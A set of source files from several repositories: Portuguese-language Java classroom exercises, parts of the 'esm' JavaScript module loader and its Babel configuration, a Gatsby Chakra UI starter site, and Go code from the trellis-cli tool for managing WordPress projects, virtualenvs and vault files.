<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/referencia/teste/Principal.java<|end_filename|>
public class Principal{
public static void main(String[] args){
Pessoa pessoa = new Pessoa();
Pessoa pessoaDois = new Pessoa();
pessoa.setNome("Felipe");
pessoaDois.setNome("Maria");
System.out.println("Pessoa Um: " + pessoa.getNome() + "\nPessoa Dois: " + pessoaDois.getNome());
pessoa = pessoaDois;
pessoa.setNome("Roberta");
System.out.println("Pessoa Um: " + pessoa.getNome() + "\nPessoa Dois: " + pessoaDois.getNome());
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/empacotamento/Pacote.java<|end_filename|>
// Import de tudo apenas para os testes
// Exemplo de empacotamento - Técnica utilizada até o Java 5
// Era utilizada quando um tipo primitivo deveria ser tratado como
// objeto (Tipo por referência)
import java.util.*;
public class Pacote{
public static void main(String[] args){
int primitivo = 10;
Integer objeto = new Integer(primitivo);
int valueObjeto = objeto.intValue();
System.out.println(valueObjeto);
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/for_e_for_each/for/Foor.java<|end_filename|>
import java.util.*;
public class Foor{
public static void main(String[] args){
int a[] = {1,2,3,4,5};
for (int i: a){
System.out.println(i);
}
}
}
<|start_filename|>4_semestre/teste_de_software/atividade_avaliacao_1/src/aula/A.java<|end_filename|>
package aula;
public class A {
public boolean m(Integer a) {
return a / 2 < 5 ? true : false;
}
public int n(int a, int b) throws Exception {
if (a < b) {
return a;
} else if (a > b) {
return b;
}
throw new Exception();
}
public String o() {
return null;
}
public String p() {
return "oi";
}
public Pessoa q() {
Pessoa p = new Pessoa();
p.nome = "Ana";
return p;
}
}
<|start_filename|>4_semestre/teste_de_software/atividade_avaliacao_2/test/aula/AreaQuadradoTest.java<|end_filename|>
package aula;
import static org.junit.Assert.assertEquals;
import java.util.Arrays;
import java.util.Collection;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import org.junit.runners.Parameterized.Parameters;
// A classe parametrizada deve ser marcada com RunWith
@RunWith(Parameterized.class)
@SuppressWarnings("rawtypes")
public class AreaQuadradoTest {
private int a;
private int b;
private int saida;
private Operacao op;
@Before
public void setUp() {
op = new Operacao();
}
@After
public void tearDown() {
op = null;
}
public AreaQuadradoTest(int b, int a, int saida) {
this.b = b;
this.a = a;
this.saida = saida;
}
@Parameters
public static Collection parameters() {
return Arrays.asList(new Object[][] {
// b, a, saida
{ 0, 0, 0 }, { 1, 1, 1 }, { 2, 0, 0 }, { 0, 2, 0 } });
}
@Test
public void testOne() throws Exception {
assertEquals(saida, op.areaRetangulo(b, a), 0);
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/estatico/Calculadora.java<|end_filename|>
// import java.util.*;
public class Calculadora{
public static Double soma(Double a, Double b){
return a + b;
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/autoboxing/AutoBoxing.java<|end_filename|>
import java.util.*;
public class AutoBoxing{
public static void main(String[] args){
// Até a versão 5 do java
int primitivo = 5; // Declara o tipo primitivo
Integer numero = new Integer(primitivo); // Era necessário instânciar uma classe do tipo requirido
// Em versões mais recentes do Java, isso não é necessário
int a = 123;
Integer b = a; // A transferência de tipo primitivo para referência é feito de forma implicita, não sendo mais necessário instânciar um objeto
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/for_e_for_each/for/FoorTres.java<|end_filename|>
import java.util.*;
public class FoorTres{
public static void main(String[] args){
int arr[] = {1,2,3};
for(int i = 0; i <= arr.length; i++)
System.out.println(arr[i]);
}
}
| M3nin0/revisor |
<|start_filename|>src/acorn/parser/error-messages.js<|end_filename|>
import MESSAGE from "../../constant/message.js"
import errors from "../../parse/errors.js"
import shared from "../../shared.js"
import { tokTypes as tt } from "../../acorn.js"
function init() {
const {
ILLEGAL_AWAIT_IN_NON_ASYNC_FUNCTION,
ILLEGAL_HTML_COMMENT,
ILLEGAL_IMPORT_META_OUTSIDE_MODULE,
ILLEGAL_NEW_TARGET,
ILLEGAL_RETURN_STATEMENT,
INVALID_ESCAPED_RESERVED_WORD,
INVALID_OR_UNEXPECTED_TOKEN,
UNEXPECTED_EOS,
UNEXPECTED_EVAL_OR_ARGUMENTS,
UNEXPECTED_IDENTIFIER,
UNEXPECTED_RESERVED_WORD,
UNEXPECTED_STRICT_MODE_RESERVED_WORD,
UNEXPECTED_STRING,
UNEXPECTED_TOKEN,
UNTERMINATED_ARGUMENTS_LIST,
UNTERMINATED_TEMPLATE
} = MESSAGE
const ENGINE_DUPLICATE_EXPORT = "Duplicate export of '"
const PARSER_DUPLICATE_EXPORT = "Duplicate export '"
const PARSER_IMPORT_EXPORT_INVALID_LEVEL = "'import' and 'export' may only appear at the top level"
const PARSER_IMPORT_EXPORT_OUTSIDE_MODULE = "'import' and 'export' may appear only with 'sourceType: module'"
const PARSER_INVALID_ESCAPED_RESERVED_WORD = "Escape sequence in keyword "
const messageLookup = new Set([
ILLEGAL_AWAIT_IN_NON_ASYNC_FUNCTION,
ILLEGAL_HTML_COMMENT,
ILLEGAL_IMPORT_META_OUTSIDE_MODULE,
ILLEGAL_NEW_TARGET,
ILLEGAL_RETURN_STATEMENT,
INVALID_ESCAPED_RESERVED_WORD,
INVALID_OR_UNEXPECTED_TOKEN,
UNEXPECTED_EOS,
UNEXPECTED_EVAL_OR_ARGUMENTS,
UNEXPECTED_IDENTIFIER,
UNEXPECTED_RESERVED_WORD,
UNEXPECTED_STRICT_MODE_RESERVED_WORD,
UNEXPECTED_STRING,
UNEXPECTED_TOKEN,
UNTERMINATED_ARGUMENTS_LIST,
UNTERMINATED_TEMPLATE
])
const replacementMap = new Map([
["'return' outside of function", ILLEGAL_RETURN_STATEMENT],
["Binding arguments in strict mode", UNEXPECTED_EVAL_OR_ARGUMENTS],
["Binding await in strict mode", UNEXPECTED_RESERVED_WORD],
["Cannot use keyword 'await' outside an async function", ILLEGAL_AWAIT_IN_NON_ASYNC_FUNCTION],
["The keyword 'await' is reserved", UNEXPECTED_RESERVED_WORD],
["The keyword 'yield' is reserved", UNEXPECTED_STRICT_MODE_RESERVED_WORD],
["Unterminated string constant", INVALID_OR_UNEXPECTED_TOKEN],
["Unterminated template", UNTERMINATED_TEMPLATE],
["new.target can only be used in functions", ILLEGAL_NEW_TARGET]
])
const Plugin = {
enable(parser) {
parser.parseExprList = parseExprList
parser.raise = raise
parser.raiseRecoverable = raise
parser.unexpected = unexpected
return parser
}
}
function parseExprList(close, allowTrailingComma, allowEmpty, refDestructuringErrors) {
const elements = []
let first = true
while (! this.eat(close)) {
if (! first) {
if (allowEmpty ||
close !== tt.parenR) {
this.expect(tt.comma)
} else if (! this.eat(tt.comma)) {
this.raise(this.start, UNTERMINATED_ARGUMENTS_LIST)
}
if (allowTrailingComma &&
this.afterTrailingComma(close)) {
break
}
} else {
first = false
}
let element
if (allowEmpty &&
this.type === tt.comma) {
element = null
} else if (this.type === tt.ellipsis) {
element = this.parseSpread(refDestructuringErrors)
if (refDestructuringErrors &&
this.type === tt.comma &&
refDestructuringErrors.trailingComma === -1) {
refDestructuringErrors.trailingComma = this.start
}
} else {
element = this.parseMaybeAssign(false, refDestructuringErrors)
}
elements.push(element)
}
return elements
}
function raise(pos, message) {
if (replacementMap.has(message)) {
message = replacementMap.get(message)
} else if (message === PARSER_IMPORT_EXPORT_INVALID_LEVEL ||
message === PARSER_IMPORT_EXPORT_OUTSIDE_MODULE) {
message = UNEXPECTED_TOKEN + " " + this.type.label
} else if (message.startsWith(PARSER_DUPLICATE_EXPORT)) {
message = message.replace(PARSER_DUPLICATE_EXPORT, ENGINE_DUPLICATE_EXPORT)
} else if (message.startsWith(PARSER_INVALID_ESCAPED_RESERVED_WORD)) {
message = INVALID_ESCAPED_RESERVED_WORD
} else if (! messageLookup.has(message) &&
! message.startsWith(UNEXPECTED_TOKEN)) {
return
}
throw new errors.SyntaxError(this, pos, message)
}
function unexpected(pos) {
if (pos === void 0) {
pos = this.start
}
const message = this.type === tt.eof
? UNEXPECTED_EOS
: INVALID_OR_UNEXPECTED_TOKEN
this.raise(pos, message)
}
return Plugin
}
export default shared.inited
? shared.module.acornParserErrorMessages
: shared.module.acornParserErrorMessages = init()
<|start_filename|>src/module/esm/parse-load.js<|end_filename|>
import ENTRY from "../../constant/entry.js"
import load from "./load.js"
import shared from "../../shared.js"
import validateDeep from "./validate-deep.js"
const {
STATE_PARSING_COMPLETED,
TYPE_CJS
} = ENTRY
function parseLoad(request, parent, isMain) {
const { moduleState } = shared
moduleState.parsing = true
moduleState.requireDepth += 1
let entry
try {
entry = load(request, parent, isMain)
} finally {
moduleState.parsing = false
moduleState.requireDepth -= 1
}
try {
entry.updateBindings()
if (entry.state === STATE_PARSING_COMPLETED) {
if (entry.type !== TYPE_CJS) {
validateDeep(entry)
}
load(request, parent, isMain)
}
} finally {
moduleState.requireDepth -= 1
}
return entry
}
export default parseLoad
<|start_filename|>.babel.config.js<|end_filename|>
"use strict"
const arrayRemove = require("./script/array-remove.js")
const babel = require("@babel/core")
function BabelEqEqEqPlugin() {
return {
visitor: {
BinaryExpression({ node }) {
const { operator } = node
if ((operator === "==" ||
operator === "!=") &&
node.left.type !== "NullLiteral" &&
node.right.type !== "NullLiteral") {
node.operator += "="
}
}
}
}
}
function BabelModePlugin({ types }) {
// Based on `isInStrictMode()`.
// Copyright <NAME> and other contributors. Released under MIT license:
// https://github.com/babel/babel/blob/master/packages/babel-traverse/src/path/introspection.js
function isInMode(path) {
const parent = path.find((path) => {
if (path.isClass()) {
return true
}
const isFunc = path.isFunction()
if (! isFunc &&
! path.isProgram()) {
return false
}
const node = isFunc
? path.node.body
: path.node
const { directives } = node
let { length } = directives
while (length--) {
const { value } = directives[length].value
if (value === "use sloppy" ||
value === "use strict") {
return true
}
}
})
return parent !== null
}
function isSimpleParameterList(params) {
return params.every(({ type }) => type === "Identifier")
}
function enterFunction(path) {
const { node } = path
const { directives } = node.body
if (directives &&
isSimpleParameterList(node.params) &&
! isInMode(path)) {
directives.push(types.directive(types.directiveLiteral("use strict")))
}
}
return {
visitor: {
ArrowFunctionExpression: enterFunction,
FunctionDeclaration: enterFunction,
FunctionExpression: enterFunction
}
}
}
function BabelOrderPlugin(plugins) {
return {
visitor: {
Program(path) {
for (const plugin of plugins) {
path.traverse(plugin(babel).visitor)
}
}
}
}
}
function BabelRemoveSloppyPlugin() {
function enterFunction({ node: { body: directives } }) {
arrayRemove(directives, ({ value: { value } }) => value === "use sloppy")
}
return {
visitor: {
ArrowFunctionExpression: enterFunction,
FunctionDeclaration: enterFunction,
FunctionExpression: enterFunction
}
}
}
const isTest = /test/.test(process.env.ESM_ENV)
module.exports = {
env: {
production: {
plugins: [
["transform-remove-console", {
exclude: ["error"]
}],
"transform-remove-debugger"
]
}
},
plugins: [
["@babel/proposal-class-properties", {
loose: true
}],
"@babel/proposal-optional-catch-binding",
["@babel/transform-arrow-functions", {
spec: false
}],
["@babel/transform-block-scoping", {
throwIfClosureRequired: false
}],
["transform-for-of-as-array", {
loose: true
}],
BabelOrderPlugin([
BabelEqEqEqPlugin,
BabelModePlugin,
BabelRemoveSloppyPlugin
])
],
presets: [
["@babel/env", {
debug: isTest,
exclude: [
"transform-async-to-generator",
"transform-for-of",
"transform-function-name"
],
loose: true,
modules: false,
targets: { node: 6 }
}]
],
sourceMaps: false
}
<|start_filename|>test/fixture/scenario/jest-config-globals/jest.config.json<|end_filename|>
{
"globals": {
"JEST_CONFIG_GLOBAL": "JEST_CONFIG_GLOBAL_VALUE"
},
"testEnvironment": "node",
"testURL": "file://",
"transform": {}
}
<|start_filename|>test/fixture/scenario/lab/test.js<|end_filename|>
import assert from "assert"
import { script } from "lab"
import { add } from "../../math/math.esm.js"
const lab = script()
lab.it("test", () => {
assert.strictEqual(add(1, 2), 3)
})
export { lab }
| michaelfig/esm |
<|start_filename|>src/components/header.js<|end_filename|>
import { Box, Flex, Heading, Link, Spacer } from '@chakra-ui/react'
import { Link as GatsbyLink } from 'gatsby'
import PropTypes from 'prop-types'
import React from 'react'
import ThemeToggle from './theme-toggle'
const Header = ({ siteTitle }) => (
<Box as="header" background="rebeccapurple" marginBottom="1.45rem">
<Box as="div" m="0 auto" maxW="960px" p="1.45rem 1.0875rem">
<Flex>
<Heading margin="0">
<Link
as={GatsbyLink}
to="/"
color="white"
_hover={{ textDecor: 'none' }}
>
{siteTitle}
</Link>
</Heading>
<Spacer />
<Box as="div" position="relative">
<ThemeToggle />
</Box>
</Flex>
</Box>
</Box>
)
Header.propTypes = {
siteTitle: PropTypes.string,
}
Header.defaultProps = {
siteTitle: ``,
}
export default Header
<|start_filename|>src/pages/page-2.js<|end_filename|>
import { Heading, Link, Text } from '@chakra-ui/react'
import { Link as GatsbyLink } from 'gatsby'
import React from 'react'
import SEO from '../components/seo'
const SecondPage = () => (
<>
<SEO title="Page two" />
<Heading>Hi from the second page</Heading>
<Text fontSize="xl" my={5}>
Welcome to page 2
</Text>
<Link
as={GatsbyLink}
to="/"
color="purple.500"
fontSize="xl"
textDecor="underline"
>
Go back to the homepage
</Link>
</>
)
export default SecondPage
<|start_filename|>gatsby-ssr.js<|end_filename|>
import { wrapPageElement as wrap } from "./src/woot-wapper"
export const wrapPageElement = wrap
<|start_filename|>src/pages/index.js<|end_filename|>
import { Box, Heading, Link, Text } from '@chakra-ui/react'
import { Link as GatsbyLink } from 'gatsby'
import React from 'react'
import Image from '../components/image'
import SEO from '../components/seo'
const IndexPage = () => (
<>
<SEO title="Home" />
<Heading>Hi people</Heading>
<Text fontSize="xl" my={5}>
Welcome to your new Gatsby site.
</Text>
<Text fontSize="xl" my={5}>
Now go build something great.
</Text>
<Box as="div" maxWidth="300px" marginBottom="1.45rem">
<Image />
</Box>
<Link
as={GatsbyLink}
textDecor="underline"
color="purple.500"
fontSize="xl"
to="/page-2/"
>
Go to page 2
</Link>
<br />
<Link
as={GatsbyLink}
textDecor="underline"
color="purple.500"
fontSize="xl"
to="/using-typescript/"
>
Go to "Using TypeScript"
</Link>
</>
)
export default IndexPage
| molebox/gatsby-starter-chakra-ui |
<|start_filename|>cmd/db_opener_sequel_ace.go<|end_filename|>
package cmd
import (
_ "embed"
"fmt"
"github.com/mitchellh/cli"
"io/ioutil"
"os"
"text/template"
"time"
)
type DBOpenerSequelAce struct {
ui cli.Ui
}
//go:embed files/sequel_ace_spf_template.xml
var sequelAceSpfTemplate string
func (o *DBOpenerSequelAce) Open(c DBCredentials) (err error) {
sequelAceSpf, sequelAceSpfErr := ioutil.TempFile("", "*.spf")
if sequelAceSpfErr != nil {
return fmt.Errorf("Error creating temporary SequelAce SPF file: %s", sequelAceSpfErr)
}
// The SPF file has to be read twice:
// 1. by the OS to open SequelAce
// 2. by SequelAce to get db credentials
// There is a chance that the SPF file got deleted before SequelAce reads the SPF file.
// We want to delete the SPF file because it contains db credentials in plain text.
// Therefore, we sleep awhile before deleting the SPF file.
// 3 seconds is an arbitrary value. It should be enough for most users.
defer func() {
time.Sleep(3 * time.Second)
os.Remove(sequelAceSpf.Name())
}()
tmpl, tmplErr := template.New("sequelAceSpf").Parse(sequelAceSpfTemplate)
if tmplErr != nil {
return fmt.Errorf("Error templating SequelAce SPF: %s", tmplErr)
}
if err := tmpl.Execute(sequelAceSpf, c); err != nil {
return fmt.Errorf("Error writing SequelAce SPF: %s", err)
}
open := execCommandWithOutput("open", []string{sequelAceSpf.Name()}, o.ui)
if err := open.Run(); err != nil {
return fmt.Errorf("Error opening database with Tableplus: %s", err)
}
return nil
}
<|start_filename|>cmd/vault_edit.go<|end_filename|>
package cmd
import (
"fmt"
"strings"
"github.com/mitchellh/cli"
"github.com/roots/trellis-cli/trellis"
)
type VaultEditCommand struct {
UI cli.Ui
Trellis *trellis.Trellis
}
func (c *VaultEditCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.Trellis.CheckVirtualenv(c.UI)
commandArgumentValidator := &CommandArgumentValidator{required: 1, optional: 0}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
file := args[0]
vaultEdit := execCommand("ansible-vault", []string{"edit", file}, c.UI)
err := vaultEdit.Run()
if err != nil {
c.UI.Error(fmt.Sprintf("Error running ansible-vault: %s", err))
return 1
}
return 0
}
func (c *VaultEditCommand) Synopsis() string {
return "Edit an encrypted file in place"
}
func (c *VaultEditCommand) Help() string {
helpText := `
Usage: trellis vault edit [options] FILE
Edit an encrypted file in place
Trellis docs: https://roots.io/trellis/docs/vault/
Ansible Vault docs: https://docs.ansible.com/ansible/latest/user_guide/vault.html
Edit production file:
$ trellis vault edit group_vars/production/vault.yml
Arguments:
FILE file name to edit
Options:
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
<|start_filename|>trellis/virtualenv.go<|end_filename|>
package trellis
import (
"fmt"
"log"
"os"
"os/exec"
"path/filepath"
"github.com/roots/trellis-cli/github"
)
const TrellisVenvEnvName string = "TRELLIS_VENV"
const VenvEnvName string = "VIRTUAL_ENV"
const PathEnvName string = "PATH"
const OldPathEnvName string = "PRE_TRELLIS_PATH"
const VirtualenvDir string = "virtualenv"
type Virtualenv struct {
Path string
BinPath string
OldPath string
}
func NewVirtualenv(path string) *Virtualenv {
return &Virtualenv{
Path: filepath.Join(path, VirtualenvDir),
BinPath: filepath.Join(path, VirtualenvDir, "bin"),
OldPath: os.Getenv(PathEnvName),
}
}
func (v *Virtualenv) Activate() {
if v.Active() {
return
}
os.Setenv(VenvEnvName, v.Path)
os.Setenv(OldPathEnvName, v.OldPath)
os.Setenv(PathEnvName, fmt.Sprintf("%s:%s", v.BinPath, v.OldPath))
}
func (v *Virtualenv) Active() bool {
return os.Getenv(VenvEnvName) == v.Path
}
func (v *Virtualenv) Create() (err error) {
_, cmd := v.Installed()
cmd.Args = append(cmd.Args, v.Path)
cmd.Stderr = os.Stderr
if v.Initialized() {
v.Activate()
return nil
}
err = cmd.Run()
if err != nil {
return err
}
v.Activate()
return nil
}
func (v *Virtualenv) Deactivate() {
os.Unsetenv(VenvEnvName)
os.Unsetenv(OldPathEnvName)
os.Setenv(PathEnvName, v.OldPath)
}
func (v *Virtualenv) LocalPath() string {
configHome := os.Getenv("XDG_CONFIG_HOME")
if configHome == "" {
homeDir, err := os.UserHomeDir()
if err != nil {
log.Fatal(err)
}
configHome = filepath.Join(homeDir, ".local", "share")
}
return filepath.Join(configHome, "trellis", "virtualenv")
}
func (v *Virtualenv) Initialized() bool {
if _, err := os.Stat(filepath.Join(v.BinPath, "python")); os.IsNotExist(err) {
return false
}
if _, err := os.Stat(filepath.Join(v.BinPath, "pip")); os.IsNotExist(err) {
return false
}
return true
}
func (v *Virtualenv) Install() string {
localPath := v.LocalPath()
configDir := filepath.Dir(localPath)
if _, err := os.Stat(configDir); os.IsNotExist(err) {
if err = os.MkdirAll(configDir, 0755); err != nil {
log.Fatal(err)
}
}
return github.DownloadRelease("pypa/virtualenv", "latest", os.TempDir(), localPath)
}
func (v *Virtualenv) Installed() (ok bool, cmd *exec.Cmd) {
path, err := exec.LookPath("virtualenv")
if err == nil {
return true, exec.Command(path)
}
path, err = exec.LookPath("python3")
if err == nil {
return true, exec.Command(path, "-m", "venv")
}
localVenvPath := filepath.Join(v.LocalPath(), "virtualenv.py")
if _, err = os.Stat(localVenvPath); !os.IsNotExist(err) {
return true, exec.Command("python", localVenvPath)
}
return false, nil
}
<|start_filename|>cmd/dot_env.go<|end_filename|>
package cmd
import (
_ "embed"
"fmt"
"strings"
"github.com/mitchellh/cli"
"github.com/roots/trellis-cli/trellis"
)
type DotEnvCommand struct {
UI cli.Ui
Trellis *trellis.Trellis
playbook PlaybookRunner
}
//go:embed files/playbooks/dot_env_template.yml
var dotenvYmlContent string
func NewDotEnvCommand(ui cli.Ui, trellis *trellis.Trellis) *DotEnvCommand {
playbook := &AdHocPlaybook{
files: map[string]string{
"dotenv.yml": dotenvYmlContent,
},
Playbook: Playbook{
ui: ui,
},
}
return &DotEnvCommand{UI: ui, Trellis: trellis, playbook: playbook}
}
func (c *DotEnvCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.Trellis.CheckVirtualenv(c.UI)
commandArgumentValidator := &CommandArgumentValidator{required: 0, optional: 1}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
environment := "development"
if len(args) == 1 {
environment = args[0]
}
environmentErr := c.Trellis.ValidateEnvironment(environment)
if environmentErr != nil {
c.UI.Error(environmentErr.Error())
return 1
}
c.playbook.SetRoot(c.Trellis.Path)
if err := c.playbook.Run("dotenv.yml", []string{"-e", "env=" + environment}); err != nil {
c.UI.Error(fmt.Sprintf("Error running ansible-playbook: %s", err))
return 1
}
return 0
}
func (c *DotEnvCommand) Synopsis() string {
return "Template .env files to local system"
}
func (c *DotEnvCommand) Help() string {
helpText := `
Usage: trellis dotenv [options] [ENVIRONMENT=development]
Template .env files to local system
Options:
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
<|start_filename|>trellis/trellis_test.go<|end_filename|>
package trellis
import (
"fmt"
"io/ioutil"
"os"
"path/filepath"
"reflect"
"testing"
)
func TestCreateConfigDir(t *testing.T) {
dir, _ := ioutil.TempDir("", "")
defer os.RemoveAll(dir)
configPath := dir + "/testing-trellis-create-config-dir"
trellis := Trellis{
ConfigDir: configPath,
}
trellis.CreateConfigDir()
_, err := os.Stat(configPath)
if err != nil {
t.Error("expected config directory to be created")
}
}
func TestEnvironmentNames(t *testing.T) {
environments := make(map[string]*Config)
// Intentionally not in alphabetical order.
environments["b"] = &Config{}
environments["z"] = &Config{}
environments["a"] = &Config{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.EnvironmentNames()
expected := []string{"a", "b", "z"}
if fmt.Sprintf("%s", actual) != fmt.Sprintf("%s", expected) {
t.Errorf("expected %s got %s", expected, actual)
}
}
func TestValidateEnvironment(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.ValidateEnvironment("a")
if actual != nil {
t.Errorf("expected nil got %s", actual)
}
}
func TestValidateEnvironmentInvalid(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.ValidateEnvironment("x")
if actual == nil {
t.Error("expected error got nil", actual)
}
}
func TestSiteNamesFromEnvironment(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites["a1"] = &Site{}
environments["a"].WordPressSites["a2"] = &Site{}
environments["a"].WordPressSites["a3"] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.SiteNamesFromEnvironment("a")
expected := []string{"a1", "a2", "a3"}
if fmt.Sprintf("%s", actual) != fmt.Sprintf("%s", expected) {
t.Errorf("expected %s got %s", expected, actual)
}
}
func TestFindSiteNameFromEnvironmentDefault(t *testing.T) {
expected := "a1"
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites[expected] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", "")
if actual != expected {
t.Errorf("expected %s got %s", expected, actual)
}
if actualErr != nil {
t.Errorf("expected nil got %s", actual)
}
}
func TestFindSiteNameFromEnvironmentDefaultError(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", "")
if actualErr == nil {
t.Error("expected error got nil")
}
if actual != "" {
t.Errorf("expected empty string got %s", actual)
}
}
func TestFindSiteNameFromEnvironmentDefaultErrorMultiple(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites["a1"] = &Site{}
environments["a"].WordPressSites["a2"] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", "")
if actualErr == nil {
t.Error("expected error got nil")
}
if actual != "" {
t.Errorf("expected empty string got %s", actual)
}
}
func TestFindSiteNameFromEnvironment(t *testing.T) {
expected := "a1"
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites[expected] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", expected)
if actual != expected {
t.Errorf("expected %s got %s", expected, actual)
}
if actualErr != nil {
t.Errorf("expected nil got %s", actual)
}
}
func TestFindSiteNameFromEnvironmentInvalid(t *testing.T) {
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites["a1"] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual, actualErr := trellis.FindSiteNameFromEnvironment("a", "not-exist")
if actualErr == nil {
t.Error("expected error got nil")
}
if actual != "" {
t.Errorf("expected empty string got %s", actual)
}
}
func TestSiteFromEnvironmentAndName(t *testing.T) {
expected := &Site{}
environments := make(map[string]*Config)
environments["a"] = &Config{
WordPressSites: make(map[string]*Site),
}
environments["a"].WordPressSites["a1"] = &Site{}
environments["a"].WordPressSites["a2"] = expected
environments["a"].WordPressSites["a3"] = &Site{}
trellis := Trellis{
Environments: environments,
}
actual := trellis.SiteFromEnvironmentAndName("a", "a2")
if actual != expected {
t.Error("expected site not returned")
}
}
func TestActivateProjectForProjects(t *testing.T) {
defer LoadFixtureProject(t)()
tp := NewTrellis()
if !tp.ActivateProject() {
t.Error("expected true")
}
wd, _ := os.Getwd()
if tp.Path != wd {
t.Errorf("expected %s to be %s", tp.Path, wd)
}
if tp.Path != wd {
t.Errorf("expected %s to be %s", tp.Path, wd)
}
}
func TestActivateProjectForNonProjects(t *testing.T) {
tempDir, err := ioutil.TempDir("", "trellis")
if err != nil {
t.Fatalf("err: %s", err)
}
defer TestChdir(t, tempDir)()
defer os.RemoveAll(tempDir)
tp := NewTrellis()
if tp.ActivateProject() {
t.Error("expected false")
}
}
func TestActivateProjectForNonVirtualenvInitializedProjects(t *testing.T) {
defer LoadFixtureProject(t)()
os.RemoveAll(".trellis/virtualenv")
tp := NewTrellis()
if tp.ActivateProject() {
t.Error("expected false")
}
}
func TestLoadProjectForProjects(t *testing.T) {
defer LoadFixtureProject(t)()
tp := NewTrellis()
err := tp.LoadProject()
wd, _ := os.Getwd()
if err != nil {
t.Error("expected LoadProject not to return an error")
}
if tp.Path != wd {
t.Errorf("expected %s to be %s", tp.Path, wd)
}
expectedConfig := &CliConfig{
Open: map[string]string{
"sentry": "https://myapp.sentry.io",
},
}
if !reflect.DeepEqual(tp.CliConfig, expectedConfig) {
t.Errorf("expected config not equal")
}
expectedEnvNames := []string{"development", "production", "valet-link"}
if !reflect.DeepEqual(tp.EnvironmentNames(), expectedEnvNames) {
t.Errorf("expected environment names %s to be %s", tp.EnvironmentNames(), expectedEnvNames)
}
}
func TestLoadCliConfigWhenFileDoesNotExist(t *testing.T) {
tp := NewTrellis()
config := tp.LoadCliConfig()
if config == nil {
t.Error("expected config object")
}
}
func TestLoadCliConfigWhenFileExists(t *testing.T) {
defer LoadFixtureProject(t)()
tp := NewTrellis()
configFilePath := filepath.Join(tp.ConfigPath(), ConfigFile)
configContents := ``
if err := ioutil.WriteFile(configFilePath, []byte(configContents), 0666); err != nil {
t.Fatal(err)
}
config := tp.LoadCliConfig()
if !reflect.DeepEqual(config, &CliConfig{}) {
t.Error("expected open object")
}
}
<|start_filename|>cmd/init.go<|end_filename|>
package cmd
import (
"bytes"
"flag"
"fmt"
"os"
"os/exec"
"strings"
"github.com/mitchellh/cli"
"github.com/roots/trellis-cli/trellis"
)
func NewInitCommand(ui cli.Ui, trellis *trellis.Trellis) *InitCommand {
c := &InitCommand{UI: ui, Trellis: trellis}
c.init()
return c
}
type InitCommand struct {
UI cli.Ui
Trellis *trellis.Trellis
flags *flag.FlagSet
force bool
}
func (c *InitCommand) init() {
c.flags = flag.NewFlagSet("", flag.ContinueOnError)
c.flags.Usage = func() { c.UI.Info(c.Help()) }
c.flags.BoolVar(&c.force, "force", false, "Force initialization by re-creating the virtualenv")
}
func (c *InitCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
if err := c.flags.Parse(args); err != nil {
c.UI.Error(err.Error())
return 1
}
args = c.flags.Args()
commandArgumentValidator := &CommandArgumentValidator{required: 0, optional: 0}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
if err := c.Trellis.CreateConfigDir(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.UI.Info("Initializing project\n")
if ok, _ := c.Trellis.Virtualenv.Installed(); !ok {
c.UI.Info("virtualenv not found")
spinner := NewSpinner(
SpinnerCfg{
Message: "Installing virtualenv",
FailMessage: "Error installing virtualenv",
},
)
spinner.Start()
c.Trellis.Virtualenv.Install()
spinner.Stop()
}
if c.force {
spinner := NewSpinner(
SpinnerCfg{
Message: "Deleting existing virtualenv",
FailMessage: "Error deleting virtualenv",
},
)
spinner.Start()
err := os.RemoveAll(c.Trellis.Virtualenv.Path)
if err != nil {
spinner.StopFail()
c.UI.Error(err.Error())
return 1
}
spinner.Stop()
}
